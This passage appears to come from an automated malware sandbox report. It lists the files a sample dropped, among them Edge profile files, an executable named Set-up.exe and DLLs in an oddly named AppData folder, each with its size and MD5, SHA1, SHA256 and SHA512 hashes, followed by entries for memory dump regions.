dd52ed27b8aff99a227df213844e73c0

SHA1
3ce43b296091a7007eb3d3aaf02df5d255491ead

SHA256
877a1e5b98aef615a4b697297834792927edc7f4304672ec9e7bd0bde9b65af8

SHA512
298d8098efa75d789999395b975688e9ae52355bbf8f2d7fc344892fdc77375b908f44c733a0011acac3203d224806f2428610e114d8a755c2555aa2e553c636

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
3f5ef863593f04ab490d549a2abcf44a

SHA1
9592f6871f516759929f612a75cba5bb304b9ef0

SHA256
fbb65896b50a61b6a17b97ee9bb2998610fb43ad959e378c1532927e71128b0a

SHA512
f4b012ac08f5afddd5e886cccf963b47c58322e6c0971944cbbb19541441dbd845b797ca294eb51bd70902c58fbe38234d3e5f2f647c44d62f55b09346b1ddb1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

Filesize
24KB

MD5
f9055ea0f42cb1609ff65d5be99750dc

SHA1
6f3a884d348e9f58271ddb0cdf4ee0e29becadd4

SHA256
1cacba6574ba8cc5278c387d6465ff72ef63df4c29cfbec5c76fbaf285d92348

SHA512
b1937bc9598d584a02c5c7ac42b96ed6121f16fe2de2623b74bb9b2ca3559fc7aff11464f83a9e9e3002a1c74d4bb0ee8136b0746a5773f8f12f857a7b2b3cb4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

Filesize
24KB

MD5
d3412a01d4c3df1df43f94ecd14a889a

SHA1
2900a987c87791c4b64d80e9ce8c8bd26b679c2f

SHA256
dd1511db0f7bf3dc835c2588c1fdd1976b6977ad7babe06380c21c63540919be

SHA512
7d216a9db336322310d7a6191ebac7d80fd4fa084413d0474f42b6eff3feb1baf3e1fb24172ea8abcb67d577f4e3aea2bc68fdb112205fc7592a311a18952f7e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\MANIFEST-000001

Filesize
41B

MD5
5af87dfd673ba2115e2fcf5cfdb727ab

SHA1
d5b5bbf396dc291274584ef71f444f420b6056f1

SHA256
f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

SHA512
de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
51d1c38c7b40369ca14df09cb93c1967

SHA1
ac0f7de60269be8134fd7a015ca661de8133b1c3

SHA256
20ae950d0367e6c8294e4e4856cdc44978b3dbab76af053d83acdd39fd11e453

SHA512
48f8d9c6086a30cbb262601007fcd5b944bb33e05d6412acaf126b992844ff8725933804865f565eeaf36786bcddf751ba12f5881875250c4da736c102e5578b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
9KB

MD5
0b29ccb80b13cea9eba4e28c58f40fc3

SHA1
7f7b53c251b8667c7fdd9cbef0deec14f277646e

SHA256
b0380d0b9568db81a1a949e12a6947aedb791553a6c43ebd08ada0e7eb52d5bd

SHA512
377ffef5dabe3f6ee53f0478212afacc51c6d525ebb0da07c4ce05cad755bb9b116069a9270453fcc8377cb10ed602d984ab1a6a70e9968e0f38d6c35a090c0f

Download Submit
C:\Users\Admin\AppData\Local\Temp\4e501578

Filesize
1.0MB

MD5
d30f6631f7d8d5bade252f436a4b5766

SHA1
84670375ad90dec1e256c86b60c5140601685816

SHA256
76e1ad8acddb0a5e80e7f274d2b35ce3d0016ee748fac23452772f43bde43e6a

SHA512
0ac7c974aadd4002450454781466bc0e8eb04471f6e2644b7cb28da029264f9e07496dff435ba0f744ad6de13f35285dec9aabe6cf70637813b2774468ad3b0c

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bljf2wkd.dek.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

Filesize
3KB

MD5
b1e6441c6c3d2b34ad0fc7d44b5aabe4

SHA1
37a31577d471f08766b61389f94cec5f0960b928

SHA256
d84db3769023e3fddbb31d21229fecc8adf4a7e870540ee8f1e9a06f737b8561

SHA512
5e57209f0e15fea7bf8aaebedde1a5a5c8c2e8fa00595fbee469e16482f73dd1d4e631ee5d2b733cdec59fb686d17d97130fd439995d4b7dc09d49c24af8f00a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

Filesize
3KB

MD5
04ff8cfb08d8750097a08bf1cd2439d3

SHA1
cc2c4be98227f13e8e4c5aeb91944755c96ba006

SHA256
5d039a97b85501e19dbc5d6708c4bee30178c1eff7a206116472b319c24feb9e

SHA512
ed608a67bfa18d9416bf9ada03abf41f6d927c4d4c349778f85b03b4490869f81c3c1d8761107c5303997e99c25ad30b0bbd7399035f338975eb066c42297c14

Download Submit
C:\Users\Admin\AppData\Roaming\QHUPRmIp\QtCore4.dll

Filesize
2.5MB

MD5
fecc62a37d37d9759e6b02041728aa23

SHA1
0c5f646caef7a6e9073d58ed698f6cfbfb2883a3

SHA256
94c1395153d7758900979351e633ab68d22ae9b306ef8e253b712a1aab54c805

SHA512
698f90f1248dacbd4bdc49045a4e80972783d9dcec120d187abd08f5ef03224b511f7870320938b7e8be049c243ffb1c450c847429434ef2e2c09288cb9286a6

Download Submit
C:\Users\Admin\AppData\Roaming\QHUPRmIp\QtGui4.dll

Filesize
8.2MB

MD5
831ba3a8c9d9916bdf82e07a3e8338cc

SHA1
6c89fd258937427d14d5042736fdfccd0049f042

SHA256
d2c8c8b6cc783e4c00a5ef3365457d776dfc1205a346b676915e39d434f5a52d

SHA512
beda57851e0e3781ece1d0ee53a3f86c52ba99cb045943227b6c8fc1848a452269f2768bf4c661e27ddfbe436df82cfd1de54706d814f81797a13fefec4602c5

Download Submit
C:\Users\Admin\AppData\Roaming\QHUPRmIp\QtNetwork4.dll

Filesize
1.0MB

MD5
8a2e025fd3ddd56c8e4f63416e46e2ec

SHA1
5f58feb11e84aa41d5548f5a30fc758221e9dd64

SHA256
52ae07d1d6a467283055a3512d655b6a43a42767024e57279784701206d97003

SHA512
8e3a449163e775dc000e9674bca81ffabc7fecd9278da5a40659620cfc9cc07f50cc29341e74176fe10717b2a12ea3d5148d1ffc906bc809b1cd5c8c59de7ba1

Download Submit
C:\Users\Admin\AppData\Roaming\QHUPRmIp\QtXml4.dll

Filesize
348KB

MD5
e9a9411d6f4c71095c996a406c56129d

SHA1
80b6eefc488a1bf983919b440a83d3c02f0319dd

SHA256
c9b2a31bfe75d1b25efcc44e1df773ab62d6d5c85ec5d0bc2dfe64129f8eab5e

SHA512
93bb3dd16de56e8bed5ac8da125681391c4e22f4941c538819ad4849913041f2e9bb807eb5570ee13da167cfecd7a08d16ad133c244eb6d25f596073626ce8a2

Download Submit
C:\Users\Admin\AppData\Roaming\QHUPRmIp\Set-up.exe

Filesize
6.2MB

MD5
11c8962675b6d535c018a63be0821e4c

SHA1
a150fa871e10919a1d626ffe37b1a400142f452b

SHA256
421e36788bfcb4433178c657d49aa711446b3a783f7697a4d7d402a503c1f273

SHA512
3973c23fc652e82f2415ff81f2756b55e46c6807cc4a8c37e5e31009cec45ab47c5d4228c03b5e3a972cacd6547cf0d3273965f263b1b2d608af89f5be6e459a

Download Submit
C:\Users\Admin\AppData\Roaming\QHUPRmIp\StarBurn.dll

Filesize
648KB

MD5
bbf0b66f271322a7c5701d5488d6a6dd

SHA1
d4978e0cfcb374066bdaefea2aacf0417830ed95

SHA256
39f8082f72067be64270647f899919582438a0c7461c439174767b139406abd8

SHA512
a98c6bbb312ecb1ba30dacb39c755de7f48ee105bb014f51f3096b225ef6a0f73258d7f142965ec94a8f4dbf8da4d0cef4e6e3b85d17201236fa7a02555cb532

Download Submit
C:\Users\Admin\AppData\Roaming\QHUPRmIp\msvcp100.dll

Filesize
411KB

MD5
03e9314004f504a14a61c3d364b62f66

SHA1
0aa3caac24fdf9d9d4c618e2bbf0a063036cd55d

SHA256
a3ba6421991241bea9c8334b62c3088f8f131ab906c3cc52113945d05016a35f

SHA512
2fcff4439d2759d93c57d49b24f28ae89b7698e284e76ac65fe2b50bdefc23a8cc3c83891d671de4e4c0f036cef810856de79ac2b028aa89a895bf35abff8c8d

Download Submit
C:\Users\Admin\AppData\Roaming\QHUPRmIp\msvcr100.dll

Filesize
752KB

MD5
67ec459e42d3081dd8fd34356f7cafc1

SHA1
1738050616169d5b17b5adac3ff0370b8c642734

SHA256
1221a09484964a6f38af5e34ee292b9afefccb3dc6e55435fd3aaf7c235d9067

SHA512
9ed1c106df217e0b4e4fbd1f4275486ceba1d8a225d6c7e47b854b0b5e6158135b81be926f51db0ad5c624f9bd1d09282332cf064680dc9f7d287073b9686d33

Download Submit
C:\Users\Admin\AppData\Roaming\QHUPRmIp\nmprwjs

Filesize
787KB

MD5
7ab8ef9419f402c83e0cd0346d9a1a67

SHA1
caa661be7346c474de569b19b09507c58a6f7d10

SHA256
4ec0eef7ce80b0181dbf5d946c7a2d40067b9bf89292b27f7496482e2f7a80a1

SHA512
aacd71428a25abb693b5e3773c94b595d659ace9894448e733809ecfacd3e1f066b1ae4bc8d477c8b112fcff44fd7f3a20e0a1fd39c8d7a7d199ce330c971c9d

Download Submit
C:\Users\Admin\AppData\Roaming\QHUPRmIp\ovaw

Filesize
23KB

MD5
90284f3d3121827201d9233a4d7cd97d

SHA1
0dff5c2b5aa628d7800b6fb163f7be7948229af5

SHA256
2c373d4495aa2e52a9f27039998bb42f3a5139929ec8d8e8963c30d3f558cc57

SHA512
dcd9c837f38970d1dd5336732ed42fa2524791c23e6410018e9e149fbd6ee584101b951f851418ca522e571a775e34ee4f45786dddb33340fc67ef1bd1c4db64

Download Submit
\??\pipe\LOCAL\crashpad_3376_WBVKUTYNVFYEMNFT

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/2140-413-0x0000000000A50000-0x0000000000AAD000-memory.dmp

Filesize
372KB

Download
memory/2140-414-0x0000000000850000-0x0000000000862000-memory.dmp

Filesize
72KB

Download
memory/2140-412-0x00007FFAFF090000-0x00007FFAFF288000-memory.dmp

Filesize
2.0MB

Download
memory/3472-404-0x0000000073D20000-0x0000000073E9B000-memory.dmp

Filesize
1.5MB

Download
memory/3472-403-0x00007FFAFF090000-0x00007FFAFF288000-memory.dmp

Filesize
2.0MB

Download
memory/3472-402-0x0000000073D20000-0x0000000073E9B000-memory.dmp

Filesize
1.5MB

Download
memory/5344-238-0x000001E30B7D0000-0x000001E30B7D1000-memory.dmp

Filesize
4KB

Download
memory/5344-235-0x000001E30B7D0000-0x000001E30B7D1000-memory.dmp

Filesize
4KB

Download
memory/5344-228-0x000001E30B7D0000-0x000001E30B7D1000-memory.dmp

Filesize
4KB

Download
memory/5344-234-0x000001E30B7D0000-0x000001E30B7D1000-memory.dmp

Filesize
4KB

Download
memory/5344-226-0x000001E30B7D0000-0x000001E30B7D1000-memory.dmp

Filesize
4KB

Download
memory/5344-232-0x000001E30B7D0000-0x000001E30B7D1000-memory.dmp

Filesize
4KB

Download
memory/5344-233-0x000001E30B7D0000-0x000001E30B7D1000-memory.dmp

Filesize
4KB

Download
memory/5344-227-0x000001E30B7D0000-0x000001E30B7D1000-memory.dmp

Filesize
4KB

Download
memory/5344-236-0x000001E30B7D0000-0x000001E30B7D1000-memory.dmp

Filesize
4KB

Download
memory/5344-237-0x000001E30B7D0000-0x000001E30B7D1000-memory.dmp

Filesize
4KB

Download
memory/5440-289-0x0000027A70FF0000-0x0000027A71002000-memory.dmp

Filesize
72KB

Download
memory/5440-290-0x0000027A70FD0000-0x0000027A70FDA000-memory.dmp

Filesize
40KB

Download
memory/5440-197-0x0000027A71410000-0x0000027A71432000-memory.dmp

Filesize
136KB

Download
memory/5612-407-0x00007FFAFF090000-0x00007FFAFF288000-memory.dmp

Filesize
2.0MB

Download
memory/5612-408-0x0000000073D20000-0x0000000073E9B000-memory.dmp

Filesize
1.5MB

Download